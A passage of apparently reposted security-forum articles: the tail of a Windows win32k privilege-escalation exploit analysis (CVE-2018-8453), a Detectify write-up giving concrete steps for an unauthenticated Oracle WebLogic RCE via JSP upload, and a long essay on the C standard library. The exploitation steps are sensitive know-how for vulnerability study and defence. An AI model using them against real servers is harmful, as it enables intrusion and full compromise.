read/write Using arbitrary memory read/write to spoof the operating system not to clean up the Bitmap object. Without this step, the system will release the Bitmap object when the program gets closed. It will cause a Double Free and result in Blue Screen. Screenshot: Patch Analysis By using Bindiff, we find that IsWindowBeingDestroyed is called to check if the window has been released before setting a new FNID in the patched version of win32kfull!NtUserSetWIndowFNID. It will return directly if the window object has been released, and will not allow setting a new FNID value. So when we call DestoryWindow, we will fail to call NtSetUserWindowFNID to set FNID. The vulnerability gets fixed since this approach prevents us from releasing pSBTrack in advance. Conclusion After investigations, we come up with PoC exploit on Windows 10 pro v1709 x86/x64 and perform privilege escalation successfully when the system is not patched. For other Windows versions, only need to change offsets of corresponding data structures, such as the offset of Token inside _EPROCESS. References [1].https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/ [2].https://blogs.msdn.microsoft.com/ntdebugging/2007/01/04/desktop-heap-overview/ [3].https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/mm64bitphysicaladdress [4].https://mp.weixin.qq.com/s/ogKCo-Jp8vc7otXyu6fTig [5].https://www.anquanke.com/post/id/168572#h2-1 [6].https://www.anquanke.com/post/id/168441#h2-0 [7].ed2k://|file|cn_windows_10_multi-edition_vl_version_1709_updated_sept_2017_x64_dvd_100090774.iso|4630972416|8867C5E54405FF9452225B66EFEE690A|/ Sursa: https://ti.360.net/blog/articles/cve-2018-8453-win32k-elevation-of-privilege-vulnerability-targeting-the-middle-east-en/
  12. [Video] Proof of Concept: CVE-2018-2894 Oracle WebLogic RCE Kristian Bremberg/November 14, 2018 A recent vulnerability was sent in to Crowdsource affecting Oracle WebLogic Server. The vulnerability is an unauthenticated remote code execution (RCE) that is easily exploited. In this article we will go through the technical aspects of the Oracle WebLogic RCE vulnerability and its exploitation. Proof of concept video: How the exploit works: The vulnerability is affecting the Web Services (WLS) subcomponent. The path: /ws_utc/config.do(on port 7001) is by default reachable without any authentication, however this pages is only available in development mode. In order to make this vulnerability exploitable, the attacker needs to set a new Work Home Dir which has to be writable. The path: servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/cssworks for this. After the new writable Work Home Dir is sat, it is then possible to upload a JSP file in the Security tab. Image: The interface where it is possible to save a Work Home Dir which will be the path where JKS keystores will be saved. The page lets an attacker upload JKS Keystores which are Java Server Pages (JSP) files. These uploaded files are then possible to access and execute. Then it is possible to do a file upload as a multipart/form-data to the path: ws_utc/resources/setting/keystore The server will then respond with XML containing the keyStoreItem ID which is used to reach the uploaded file in the format of:/ws_utc/css/config/keystore/1582617386107_filename.jsp Image: After a successful upload of a JKS Keystore the response will contain its ID. Impact: If a hacker acts upon this vulnerability, they may be able to completely compromise the server. However, due to the test page only existing in development mode, it is very important to check that your WebLogic server is not running in development mode. In some cases the port 7001 is filtered and therefore not reachable on the Internet. For an attacker it is very easy to detect this vulnerability. WebLogic is easily fingerprinted (with its Server header) and a quick search on Shodan shows that there are many instances open on the Internet. Additional information: For the full security advisory about Orable Weblogic RCE, read more on Oracle Critical Patch Update Advisory. Log into your Detectify account to find out if your applications are vulnerable and get the remediation tips. Questions or comments? Let us know in the section below. Begin a scan for the latest vulnerabilities today. Start a free trial with Detectify here! Detectify is a continuous web scanner monitor service that can be set up for automated scanning for 1000+ known vulnerabilities including the OWASP Top 10. Check for the latest vulnerabilities! Written by Krisitian Bremberg Edited by Jocelyn Chan Sursa: https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/
  13. Inside the C Standard Library January 19, 2019 Newsletter ↳ After diving into the C language through K&R, and then studying portability (see C Portability Lessons from Weird Machines), my next challenge was to take a systematic look at the standard library. To do this I worked through P. J. Plauger’s book The Standard C Library (ISBN 978-0131315099) where he examines an implementation of all the functions. It has a chapter for each header, with background information, an excerpt from the C89 standard, tips on use, and full implemention with tests. The author was on the X3J11 committee that defined ANSI C. As I worked through the book – trying first to write the examples myself, then comparing his code to mine, and finally running the examples – I kept notes with questions about portability, rationale, and C behavior. By cross-referencing the following books, asking questions on IRC, and browsing StackOverflow and the comp.lang.c archives, I found satisfactory answers. “The C Standard: Incorporating Technical Corrigendum 1” by The British Standards Institution (ISBN 978-0470845738). This is the C99 standard itself (rather than C89 like Plauger’s book), and it includes an entire first half devoted to the rationale behind language and library choices. This is helpful for understanding C semantics. “Portable C Software” by Mark R. Horton (ISBN 978-0138680503). Written after ANSI C was standardized, but early enough where it wasn’t fully adopted. He provides early history of each standard library function, as well as some functions that are now defunct. “Portable C” by Henry Rabinowitz (ISBN 978-0136859673). Great for illustrating the design decisions of the language as it relates to diverse hardware. “The CERT C Coding Standard” by Robert C. Seacord (ISBN 978-0321984043). Illustrates potential insecurity with, among other things, the standard library. Lists real code that caused vulnerabilities. “C Programming FAQs” by Steve Summit (ISBN 978-0201845198). I can see why these were historically the most frequently asked questions. I asked many of them myself. This article is not a comprehensive explanation of the standard by any means. It’s just things that were new or interesting to me. Some of it may be old news to you, and conversely I may have omitted something that seemed basic to me but would have been useful to mention. The focus is C89, with comparisons to the later standards C99 and C11 when relevant. Brief History of the Library Functions in the library grew organically from communities of programmers sharing ideas and implementations. Many groups of people used C on Unix throughout the 70s, across multiple architectures. They wrote compilers with extra features, and experimented with additions to Unix. By February 1978 core C practice had stabilized to the point where Kernighan and Ritchie codified it in the first edition of their book The C Programming Language (ISBN 978-0131101630). By 1980 C users formed the “/usr/group” organization to combine their library experience into an informal standard, which they released in 1984. Meanwhile in 1983, the American National Standards Institute (ANSI) formed a committee, X3J11, to establish a standard specification of C and officially standardize the library. The committee reviewed the work of /usr/group, K&R 1st edition, and various compiler extensions. They deliberated from 1983 to 1989 to produce the C89 standard (“ANSI C”). “Design by committee” may not have pleasant associations for some people, but in this case the committee drew on a lot of experience, and often declined to speculatively innovate, working to clarify existing practice instead. The result was a small, tight language and standard library. Compared with libraries in other languages, the standard C library is lean. It doesn’t have much in the way of general algorithms or containers. This helped the language port easily and more widely. The library has basic facilities for time, math, I/O etc, and operates on simple types. It also provides portable facilities to do non-portable things, like variadic arguments, and non-local gotos. assert.h A simple way to halt a program with debugging information if an assumption doesn’t hold: #include <assert.h> int main(void) { assert(1 == 0); } /* outputs Assertion failed: (1 == 0), function main, file assert.c, line 2. Abort trap: 6 */ Because it echoes the statement under test and includes a filename and line number, it’s useful for a quick and dirty test suite. Furthermore, assert() calls abort() rather than exit(), which causes the program to quit and dump core if permitted by the operating system. If the binary was compiled with debugging support you can load that core file in a debugger and inspect the program’s full state at the time the assertion was made: gdb -c /path/to/corefile # ^^^ inspect variables, backtrace, etc in the debugger This means that littering functions liberally with assertions can be a good way to debug problems. It provides richer information than debug print statements in situations where it’s OK to terminate the program. It also adds no overhead to the final release, because the assertions will be removed by the preprocessor when compiled with NDEBUG defined. This can be done by adding -DNDEBUG to CFLAGS or by adding a regular #define NDEBUG in the code. All headers in the standard library are idempotent, except assert.h. By including it multiple times in a file you can enable or disable the assert macro. #define NDEBUG #include <assert.h> /* Now assert() won't do anything... */ #undef NDEBUG #include <assert.h> /* Now assert() works again */ It’s OK to include assert.h twice in a row because it causes what C calls a “benign” redefinition of the assert macro. /* no harm, this is a benign redefinition: */ #define FUN 1 #define FUN 1 /* not benign and not allowed: */ #define FUN 1 #define FUN 2 A properly designed assert macro should work in any context, even somewhere weird like for (i = 0, assert(n<10); i < n; ++i). Because I didn’t think of this, my own attempt at writing assert used an if statement. In fact this is what Mark Horton shows in his Portable C Software book: /* incorrect definition */ #ifndef NDEBUG #define assert(p) (if(!(p)) ... ) #else #define assert(p) ; #endif This can be improved. Plauger uses the ternary operator, and substitutes the result ((void)0) when the predicate holds. He also keeps the code (to print the error and exit) in a real function which is defined in a separate source file. That’s because headers in the standard library are not allowed to include each other. It’s a self-imposed discipline. The last trick I found interesting was how to delay preprocessor evaluation into two steps using these helpers: /* a "thunk" to evaluate __LINE__ */ #define _STR(x) _VAL(x) #define _VAL(x) #x The string can then be built as "Assertion failed: " #p ", file " __FILE__ ", line " _STR(__LINE__) "\n" Finally, some implementations tolerate an arbitrary scalar expression as the argument to assert, but the ANSI committee decided to require int expressions for correct operation. Given that it was the first header I saw in Plauger’s book, this is where I learned that the standard reserves names like _Foo starting with underscore and a capital letter, for the standard library. Don’t use that naming convention in regular code. ctype.h Although I learned a few things from this header, it was ultimately kind of a letdown. It’s not sufficient for international text processing because, while the functions operate on the int type, they specify that its value should fall in the range of unsigned char or the negative value EOF. So while non-English speakers can use a new codepage for their locale, it will be unable to hold more than 255 symbols (plus \0, plus EOF), which is too few for east asian languages. C99 introduced wctype.h to operate on wide characters, but that has its own problems. (More about that in the stdlib.h section below.) Even for languages which fit in an 8-bit codepage, the ctype functions don’t always suffice. For example the German letter ß uppercases into two letters, SS. The tupper() function in ctype.h can’t handle it, replacing one character with another. The greek letter Σ ordinarily lowercases to σ, except at the end of a word where it should be ς. The tolower() function doesn’t have enough context to pick the correct form. I still learned some interesting techniques by studying this header. Plauger implements all the isxxxxx() functions with a lookup table of bit-packed shorts. The table itself is specific to EOF (from stdio.h) being -1, and relies on a certain size of unsigned char. The code uses a nice trick to fail early on a system where this assumption is incorrect: #include <limits.h> #include <stdio.h> #if EOF != -1 || UCHAR_MAX != 255 #error WRONG TABLES IN CTYPE.H #endif Although the code is non-portable, it fails in the most honest and upfront way possible at compile time. Also as a historical note, the isxxxxx() functions used to be defined only for 7-bit characters, but ANSI requires them to handle all values for unsigned char. One advantage of using a lookup table is that the value to be looked up requires only one evaluation. Thus the lookup function can be a macro without danger of executing code with a side effect more than once. /* evaluates c at least twice */ #define isalpha(c) \ (((c) >= 'a' && (c) <= 'z') || ((c) >= 'A' && (c) <= 'Z')) /* evaluates c only once */ #define isalpha(c) (_Ctype[(int)(c)] & (_LO|_UP)) /* consider how this would behave */ if (isalpha(c = getchar())) ... Using macros for these little functions is good for performance. However, every library function in the standard library (unless specifically noted otherwise) must be represented as an actual function too, in case a program wishes to pass its address as a parameter to another function. How can we define a function called “isalpha” if that name is also recognized by the preprocessor? I learned you can just enclose the name in parens: int (isalpha)(int c) { return (_Ctype[(int)(c)] & (_LO|_UP)); } /* now &isalpha will be defined if needed */ The trick is used throughout the standard library but I first saw it in ctype. Conversely, every library function is a candidate for redefinition as a macro, provided that the macro evaluates each of the arguments exactly once and parenthesizes them thoroughly. (Well, getc is an exception but more on that later.) Another trick is to perform an array lookup using a pointer that is shifted forward in the original array. static const short ctyp_tab[257] = {0, /* ... */}; const short *_Ctype = &ctyp_tab[1]; The shifted pointer allows EOF (-1) to be looked up easily without undefined behavior. The expression _Ctype[EOF] means _Ctype[-1] which is the same as *(ctyp_tab+1-1), which does not attempt to dereference – or even point to – memory before a primary data object. Pointers are allowed to be assigned only addresses either inside, or one space to the right, of a data object. (Data objects are arrays, structures, or regions allocated from the heap. See Rabinowitz’s book for a good discussion of this.) Character codes 128-255 are interpreted as negative numbers when considered as signed char. C does not specify whether char is signed or unsigned (it varies by platform). When char is signed, beware of converting it to int for the ctype functions. The integral promotion will “sign-extend,” creating a negative int value. This is not suitable for ctype functions, which require int values that are either storable in unsigned char or are the special EOF value. To avoid sign extension, cast char values to unsigned char in calls to ctype functions. errno.h Errno is the mechanism everyone loves to hate. The X3J11 committee wanted to remove it but decided not to make such a radical innovation on existing practice. In the early drafts of the standard it was kept it in stddef.h, but they decided that stddef should exist on freestanding environments and they split errno.h off into its own header. Not much to say about it. The errno global variable is set to zero at the start of program execution. Library functions can set it to nonzero values but will never set it to zero themselves. To use it, explicitly set it to zero yourself, call a library function, then check whether errno changed. One interesting tidbit is that errno is sometimes not a global variable at all, but a macro for (*_Error()). Having to set a real data object immediately after performing hardware floating point ops would break the FPU pipeline. Allowing the check to be deferred until requested with this _Error() function doesn’t break the pipeline. float.h, limits.h, and math.h Both float.h and limits.h are inventions of the committee. You can generate them with the enquire program written by Steven Pemberton. It performs runtime checks on the data types to find information about them, then generates the desired header file. It’s extremely portable. It also detects and outputs information about the representation of base types, like endianness. I decided not to slow down to study these headers in depth because I lack the knowledge of floating point representation necessary to understand the internals of the functions inside. I do know the definitions and parameters in float.h were recommended by numerical analysts on the Committee. The set was chosen so as not to prejudice an implementation’s selection of floating-point representation. The math functions are written carefully to avoid overflow and underflow. I’ll revisit the topic after studying Michael Overton’s short book, “Numerical Computing with IEEE Floating Point Arithmetic.” locale.h Changing a program’s locale tells it how to handle local customs. There are multiple locale categories that can be adjusted independently. They control different things, like the codeset used by ctype, the date or monetary formatting desired, or alphabetical sort order. Typically all categories are set to the same locale. The alternative – a so called “mixed locale” – is less common. Some of the settings are meant for interpretation by your own program, and others automatically affect the C standard library. For example, when parsing a double, strtod checks what the current locale uses for a decimal point symbol. Even if you want to avoid ctype and use a third-party Unicode library, some of the locale information is still useful for your program. By default C programs use the “C” locale, which is ASCII text and American formatting. The most respectful thing, though, is to accept the locale in all categories as set by system environment variables. This is indicated by the empty string for locale name. #include <locale.h> #include <stdio.h> #include <stdlib.h> int main(void) { if (setlocale(LC_ALL, "") == NULL) { fputs("Unable to select system locale", stderr); return EXIT_FAILURE; } /* ... */ } To see what locales are known on your local system, run locale -a There are 203 installed on MacOS. The list begins with: en_NZ nl_NL.UTF-8 pt_BR.UTF-8 fr_CH.ISO8859-15 eu_ES.ISO8859-15 en_US.US-ASCII af_ZA … They are in the format [language[_territory][.codeset]]. OpenBSD has chosen to support only the “C” (aka “POSIX”) and “UTF-8” codesets, but supports many languages and territories in the other locale categories. Unicode subsumes all those partial character encodings, so BSD just wanted to eliminate a source of complexity. One way to see locales in action is by setting environment variables and using Unix tools. We can change sort order using LC_COLLATE. cat <<EOF >cn.txt 我 喜 歡 整 理 單 詞 EOF LC_COLLATE=C sort <cn.txt LC_COLLATE=zh_CN.UTF-8 sort <cn.txt 理 喜 我 單 詞 我 歡 整 整 歡 喜 理 單 詞 Setlocale() doesn’t play well with threads because it updates an internal global variable. Set the locale before spawning threads. One other random nugget of wisdom from the book, unrelated to locales but mentioned in that chapter, is to use a tool to visualize the call tree in a C program. This can help you understand a new codebase. Try cflow. See also Steve Summit’s C FAQ question 18.1. setjmp.h The setjmp/longjump functions create a “saveable goto” statement to return to places you’ve already been. It allows jumping from one function into another. They are like the C programmer’s version of exception handling. Setjmp and longjmp are very tricky inside, as they have to save and restore variables, arguments, registers etc to resume execution in another location. #include <setjmp.h> #include <stdio.h> void dostuff(void); jmp_buf target; int main(void) { if (setjmp(target) == 0) { puts("Saved the target, continuing on."); dostuff(); } else puts("I feel like I've been here before..."); return 0; } void dostuff(void) { longjmp(target, 42); } To indicate that the jmp_buf was set, setjmp returns 0. When execution is jumped back to this point, setjmp returns value passed as the second argument to longjmp, for us 42. The same if statement is evaluated again but with a different result, like waking up in an alternate universe. As simple as this looks, it’s easy to break. The statement containing setjmp must be very simple. Calling setjmp in an if statement or switch statement are fine, but you should not save the return value like n = setjmp(...). An assignment statement is too complicated and can disturb the sensitive machinery. The function containing setjmp should be as simple as possible. Only variables declared as volatile are guaranteed to be restored. Generally it’s best to execute the real processing in another function called when setjmp returns 0. Longjmp should not be called from an exit handler (i.e., a function registered with the atexit function). Finally it’s undefined behavior to attempt to longjmp to a function that has since returned. Thus longjmp’s usual use case is like exceptions in other languages, going back up the call chain, skipping intermediate functions. The jmp_buf type is actually an array behind a typedef, which is why it’s typically passed to setjmp without an ampersand. The standard forbids jmp_buf to be implemented as a scalar or struct. Given all these caveats, the committee considered requiring that compilers recognize calling setjmp as a special case. Then the function could work in all types of statements. However they decided against it for consistency because they don’t require any other function to be a special case (although they allow compiler writers to make special cases as desired). signal.h Signals are a UNIX technique for interprocess communication that causes a process to asynchronously call a handler function, or else take a default action. Programs also receive “synchronous” signals for their own logical exceptions like division by zero, segmentation faults, or floating point problems. The ANSI committee decided to standardize a weakened portable version of signal functionality. Portable signal handlers can do very little. Here’s a typical example of what a handler can do safely: /* a global */ volatile sig_atomic_t intflag = 0; /* SIGINT handler */ void field_int(int sig) { signal(SIGINT, &field_int); intflag = 1; return; } It does as little as possible, simply setting a global variable which regular code can check at leisure. One thing to note is that it re-installs itself in the very first line with the signal() function. That’s because on some platforms (like Linux), as soon as a signal is handled it reverts to its default handler, which in the case of SIGINT terminates the program. Other systems such as BSD leave a handler installed when called. On Linux this would be an unwise thing to do: void field_int_badly(int sig) { /* open a window where a repeat signal could * hit the default handler before we reinstall */ sleep(1); signal(SIGINT, &int_catch); intflag = 1; return; } Even our earlier technique of calling signal() right away in the handler isn’t completely safe. The CERT C Coding Standard warns that this leaves a tiny window open for a race condition. They suggest not to use the C library signal functionality at all, but the equivalent POSIX functions instead. POSIX allows you to specify persistence of the handler during initial registration. Another thing to note is the type declaration of the shared flag (that we called intflag in the example). Exception handlers should read and write only volatile variables. For asynchronous exceptions, volatile alone isn’t even enough. The variable should be small enough that it can be read or written atomically by the processor. The C standard provides the sig_atomic_t typedef for this. Each standard library implementation defines it as an alias for a suitably small integral underlying type. If you’re writing portable code, don’t assume that sig_atomic_t is anything bigger than a char, and don’t assume its signedness. Thus the portable value range is 0…127, although C99 added macros to determine its min and max values. The standard says not to call any standard library functions from a signal handler except abort(), exit(), longjmp() or signal(). Certainly avoid any functions that interact with state, like those performing I/O or else stdio streams can become corrupted. Even though the C standard says it’s OK to call longjmp from a signal handler, CERT gave an example where doing so caused a vulnerability [VU #834865] in Sendmail because it allowed attackers to time a race condition in main() by timing signals. A program can raise signals for itself with the raise() function. (It used to be called kill.) However longjmp() is less tricky than raising signals for yourself and should be preferred. The standard library defines this limited list of signals: SIGABRT abnormal termination, such as is initiated by the abort function SIGPPE an erroneous arithmetic operation, such as zero divide or an operation resulting in overflow SIGILL detection of an invalid function image, such as an illegal instruction SIGINT receipt of an interactive attention signal SIGSEGV an invalid access to storage SIGTERM a termination request sent to the program Using other signals makes a program less portable. stdarg.h On the PDP-11 it was easy to walk function arguments with a pointer. The memory layout of arguments was well known, the size of pointers was the same as the size of int, and the original C language could not pass structures by value. However when spreading to other architectures, C benefited from creating a portable way to access variable numbers of arguments. Non-PDP architectures had complex calling conventions. Using a library for variadic arguments makes code clearer too, whether or not portability is an issue. Pre-ANSI C on UNIX used <varargs.h>, which required a final “dummy argument.” ANSI C got more picky about arguments matching a declaration, and introduced the “…” token to take the place of the dummy argument, which breaks varargs. The “…” also signals to a compiler that it may want to change the function calling convention. The committee turned varargs.h into stdarg.h, and generalized the macros to the extent that all known C implementations would be able to handle them with little modification. This functionality was important for other functions in the standard library like printf and scanf. Using the library is pretty easy, just initialize the list based on the final fixed argument, loop through the args, and release the list. /* add a list of n numbers */ int sum(int n, ...) { va_list ap; int s; va_start(ap, n); for (s = 0; n > 0; --n) s += va_arg(ap, int); va_end(ap); return s; } It is undefined behavior to call va_arg() more times than there are arguments, so the function will need to determine the number of arguments by other means. Our function above consults the n parameter for that information. Speaking of the n variable, we’re not actually passing its value to va_start(), much as it may look. The va_start macro manipulates “n” as merely a name, so it can calculate the address of the next argument. Both va_start and va_arg must be implemented as macros, not as functions. These are the portable assumptions for using stdarg.h: The variadic function must declare at least one fixed argument The function must call va_end before returning (for cleanup on some architectures) va_arg can deal only with those types that become pointers by appending “*” to them. Thus register variables, functions, and arrays can’t be returned by va_arg If a type widens with default argument promotions, then va_arg should request the widened type The last point requires some explanation. When functions had no prototypes in pre-ANSI C, the compiler would promote smaller types to wider ones when sending them to functions. That’s because doing so is essentially free – it costs more to put a byte in a register than to put a word in. Although ANSI requires functions to have prototypes, the promotion rule still applies to variadic arguments. Char and short get expanded to int, and float gets promoted to double. Thus to accept a char argument, ask for its value with va_arg(ap, int) and then cast to char. Don’t do va_arg(ap, char). To pass a va_list to another function for continued processing either a) memcpy it if you want to consume all arguments in the current function or b) pass a pointer to it if the called function should consume some or all of the arguments. C99 added va_copy() for the first scenario. The implementation of stdarg.h macros is gnarly and entirely platform specific. On my system they resolve to builtin compiler functions. stddef.h Stddef.h is a catchall place for definitions, sort of like stdlib.h. Why make two headers rather than combine them into one? It’s because C can be compiled in either a “hosted” or a “freestanding” environment. The latter is for embedded programming where there isn’t enough room for the entire standard library. An implementation must include all the standard library headers to be considered a hosted environment, while a freestanding environment must include only float.h, limits.h, stdarg.h, and stddef.h. The committee deliberated about putting the things in stddef into the C language itself, but decided the need to extend C is not quite there. Stddef provides ptrdiff_t, size_t, wchar_t, NULL, and offsetof(structname, attrib). Only ptrdiff_t and offsetof are unique to this header. Other headers usually contain duplicates of the other definitions. I used to think that NULL was a reserved word in C, but have come to learn that the constant 0 is actually the crux. The compiler treats 0 specially in a pointer context and transforms it to whatever value represents the NULL pointer on the given architecture (which needn’t be bitwise zero). Thus NULL is typically a macro for ((void *)0). As such it can’t be assigned to a function pointer because data pointers needn’t be the same size as function pointers. Some compilers allow you to do it, but don’t count on it. The reliable method is to cast zero as needed, e.g. (int (*)(void))0. The typedef size_t is an unsigned integral type big enough to hold the size of the largest possible object in memory. In some systems that might not be very large, for instance only 64k in the segmented memory model on the Intel 80286. Related rule of thumb: if a variable is going to index an array, it should be type size_t. The typedef ptrdiff_t is a signed integral type of the result of a pointer subtraction. It’s signed because if (p - q) is positive then (q - p) will be negative. Note that if size_t is already the largest integer type, then ptrdiff_t can be no larger, yet the latter loses one bit to hold the sign. So it’s possible to make an array with cells too far apart for ptrdiff_t to measure. (Assuming there is room in memory for such a large single array.) C99 provides a macro SIZE_MAX with the maximum value possible in size_t. C89 doesn’t have it, although you can obtain the value by casting (size_t)-1. This assumes a twos’ complement architecture, which is the most common number representation on modern computers. You can enforce the requirement like this: #include <limits.h> #if ULONG_MAX != -1UL #error "This code requires 2s' complement arithmetic" #endif The offsetof() macro can determine the offset in bytes of a member within its structure. This cannot easily be determined otherwise due to structure padding. The C99 rationale talks about using it to provide “generic” routines that work from descriptions of the structures, rather than from the structure declarations themselves. On many platforms it is defined as: #define offsetof(type, field) ((size_t)(&((type *)0)->field)) That’s undefined behavior, but that’s what the standard library is for: a portable way to do sometimes non-portable operations. stdio.h UNIX I/O was clean and simple compared with other systems of its day. It was 8-bit clean, and used a consistent line terminator. At the edges ioctl() would translate the simple I/O streams for the idiosyncrasies of attached devices. The kernel would hold file control state internally and give programs a simple integer descriptor for to use when reading and writing. Leaving UNIX, C ran up against the complexity of I/O on other systems. The X3J11 committee talked with vendors and came away with a sharper understanding of the I/O model they wanted to support. They had to distinguish text and binary modes. DOS used \n\r for line endings. The \r had to be stripped in text mode but not binary mode. UNIX ignores binary mode, but you better enable it for portability when necessary. UNIX also had an unusually faithful representation of files. You could put bytes in and expect to read them out unchanged. When doing fully portable I/O keep these caveats in mind: A final line without a terminating newline (in text mode) can confuse some systems, and they may drop the line or append a newline. Don’t count on the system preserving trailing space in a line. Some systems strip it out. Conversely, some systems add a space to a blank line so the line “has something in it.” The maximum fully portable line length is 254 characters. Implementations are free to pad the end of binary files with a block of NUL characters to make the files match certain disk block sizes. Another difference between the C standard I/O and UNIX is buffering. In UNIX, people often wrote their own buffering code to reduce the number of relatively costly I/O system calls. The X3J11 committee decided to include this buffering functionality in stdio. Buffering is an optimization that can be tailored to expected patterns of I/O. The standard library provides the setvbuf() function to change the size and location of a stream’s buffer, as well as choosing between line or block buffering. By default, stdin and stdout are line and block buffered respectively, and stderr is unbuffered. Setvbuf() must be called immediately after a stream is opened, before I/O happens, to have any chance of working. (stdio.h) opening and closing Perhaps surprisingly, there is a lot to learn about just opening files. First there may be a limit on how long a filename can be on a system. Stdio provides the FILENAME_MAX macro with this limit. If the system imposes no practical limit then the macro is just a suggested size. This value could be both too short, or paradoxically too long. If it is set very large then you might end up wasting memory or causing problems if allocating on the stack. Similarly L_tmpnam is the size needed for an array large enough to hold a temporary filename generated by tmpnam(). This function is a security hazard (though it can be useful for generating entropy). It introduces a Time of Check, Time of Use (TOCTOU) race condition because another program or thread could obtain the same temporary file name and create the file first. Use the tmpfile() function instead which actually creates the file, and registers it for removal on normal program exit(). Another common TOCTOU happens with fopen() when trying to create but not replace a file. Programs first check existence, right after which an evildoer can create a symlink of the same name in time for the fopen with “w” mode to overwrite another file with possibly elevated permissions. /* dangerous */ FILE *fp = fopen("foo.txt","r"); /* <-- attacker gets busy here */ if (!fp) { fp = fopen("foo.txt","w"); ... fclose(fp); } else fclose(fp); C99 fixes this with an “x” (exclusive) mode modifier. If exclusive mode is specified (“wx”), the fopen fails if the file already exists or cannot be created. In C89 you can either go beyond the standard library, using the POSIX open() function with the O_CREAT | O_EXCL flags, or just try to keep the time between check and write as small as possible. Once you have opened a file to your liking, or have been given a FILE pointer, treat the pointer as totally opaque. Don’t even try to make a copy of the FILE structure because some implementations rely on magic memory addresses for some of them. The CERT standard (FIO38-C) says that the following can cause a crash on some platforms if you try to use my_stdout: /* don't do this */ FILE my_stdout = *stdout; There’s a related function called freopen(), but it’s not used very often. The main use is converting a big program from reading stdin to reading a named file. It’s the simplest way to do that, whereas a new program should just directly fopen whatever file it wants. During a normal program exit, all open files will be closed. Still, it’s useful to explicitly call fclose() on file handles. It helps avoid exceeding the FOPEN_MAX limit of files that can be open at once. Also, failing to properly close files may allow an attacker to exhaust system resources and can increase the risk that file buffers will not be flushed in the event of abnormal program termination. Speaking of flushing buffers, fflush() might force items in the buffer to be processed, but there is no guarantee. For convenience, fflush(NULL) flushes all streams, which is useful in preparation for possible loss of program control, like going into a dangerous section, or telling the user to turn off the computer. Two other quirks. Some operating systems will not actually create a file that you fopen() and fclose() unless you write something. Also you can close stdout or stderr, and there are sometimes reasons to do so! (stdio.h) file navigation Stdio.h has two similar pairs of functions to move around in a file: fgetpos/fsetpos and ftell/fseek. Why the duplication? The second pair represents position as a long integer. When the file is opened in binary mode, this long is the number of bytes from the start of file. This is useful because you can do arithmetic on the integer to jump to particular places. The drawback is that on some systems a long is only 32 bits, so cannot support large files. The fgetpos/fsetpos pair works using a special structure that can represent positions in huge files. You must treat treat this structure as a magic bookmark. It’s only obtainable from a call to fgetpos, you cannot construct your own to point to a position you haven’t already been. Stdio also includes a rewind() function, but don’t use it. It actively clears the error indicator for a stream. Instead do a fseek(stream, 0L, SEEK_SET). These navigation commands were interesting to me, so I created a project called randln to experiment with different ways of picking a random line from a text file. You might find it interesting to look at the pros and cons of each method as explained in the readme. You can actually inspect I/O as it happens. The trick is walk the program through a debugger while tracing its system calls in another terminal. To use that randln program as an example, First start it in the debugger. Enable tracing for the debugger’s I/O and that of its children. ktrace -i -ti gdb randln Put a breakpoint in the line-finding function and start the program. In another terminal find the PID of randln that was launched by gdb, and start tailing the ktrace dump. This command will show the first 20 bytes of data in each I/O request: kdump -m 20 -l -p <pid> Now step through the program in the debugger and watch the consequences of each statement. A final note about stream navigation and the shell. I noticed when doing foo <barthe program can perform fseeks on bar, but cat bar | foo cannot. It’s another reason not to abuse cat. (stdio.h) reading and writing The foundation of all stream input is fgetc(). The other standard library input functions must be implemented as if they call it repeatedly, even if they don’t. It pulls a character out of a stream (or a character that was pushed back by ungetc() if such exists), and refills the stream buffer if needed. Some platforms allow ungetc() to push back a whole stack of characters, but the portable assumption is that it can store only one. While fgetc is a function, getc() is a macro that avoids incurring a function call just to get a character. The downside is that getc() is allowed to evaluate its argument more than once, so don’t do anything with a side effect there. Now, fgetc() is allowed to be a macro too, but may not be as efficient because it has less freedom in its implementation. It is not permitted to evaluate its argument twice. Moving up the food chain we come to gets(), which reads characters into a string until it encounters the NUL character – and it’s a buffer overflow waiting to happen. It was removed in C11. The fgets() function is better because you can specify a max length. However if it fails, the contents of the array being written is indeterminate. It is necessary to reset the string to a known value to avoid errors on subsequent string manipulation functions. The fread/fwrite functions work in chunks. My only notes about them are /* prefer this */ fread(buf, 1, size*n, stream) /* over this */ fread(buf, size, n, stream) The second form is worse because you can’t detect whether it read an extra size-1 characters past what it reports. Also some implementations of fread (fwrite) simply call fgetc (fputc) in a loop, whereas others are more optimized. Doing a straight UNIX read (write) can be faster. The standard library doesn’t allow alternating reads and writes without intervening operations to flush or explicitly position the stream: after writing, call fseek(), fsetpos(), rewind(), or fflush() before reading after reading, call fseek(), fsetpos(), or rewind() before writing unless the file is at EOF: a read that hits EOF can be followed immediately by a write The last thing I wanted to mention about reading and writing is a freak consequence of weird machines. On some digital signal processors (or more generally on the DeathStation 9000), both char and int are 32 bits. This causes a vulnerability in the common pattern: int c; while ((c = getchar()) != EOF) ...; There is no extra room in the int type to hold EOF as distinct from a valid character code, so a valid character can make the loop stop early. It’s a high severity bug, a variation of which caused a nasty vulnerability in the bash shell, CA-1996-22. Fine, you say, you don’t plan to target such machines! #include <limits.h> #if UCHAR_MAX == UINT_MAX #error "Your machine is weird." #endif Also you’ll be careful not to indicate a parse failure with an unsigned code that casts to a signed value of EOF. Well the same logic can still trick you in C99 with wide characters if you’re not careful. It works like this: the fgetwc(), getwc(), and getwchar() functions return a value of type wint_t. This value can represent the next wide character read, or it can represent WEOF, which indicates end-of-file for wide character streams. On most implementations, the wchar_t type has the same width as wint_t, and these functions can return a character indistinguishable from WEOF. For this situation be sure to check after the loop for feof() and ferror(). If neither happened then you’ve received a wide character that resembles WFEOF. It’s yet another place where wide character implementations are half baked. (stdio.h) formatting Scanf and printf have formatting options I hadn’t seen before. First of all they can limit the length of strings they read or write. /* limit to 10 characters */ printf("%.10s", big_string); /* or limit to n characters */ printf("%.*s", n, big_string); /* limit to 10 characters */ scanf("%10s", input); I used to think scanf was very unsafe, but this limiting helps. Scanf also supports “scansets” to match strings containing specific characters. Here is how to match up to ten vowels: %10[aeiou]. Scanf also allows you to match but not capture, using *. E.g. %*d. The %n option saves the number of characters read so far in the scan. Finally, in C99 printf has modifiers for size_t (%zu) and ptrdiff_t (%td). Because they are typedefs which change by architecture there is otherwise no way to specify them portably. stdlib.h Stdlib is a hodgepodge. It has six categories of functions inside: algorithms (search, 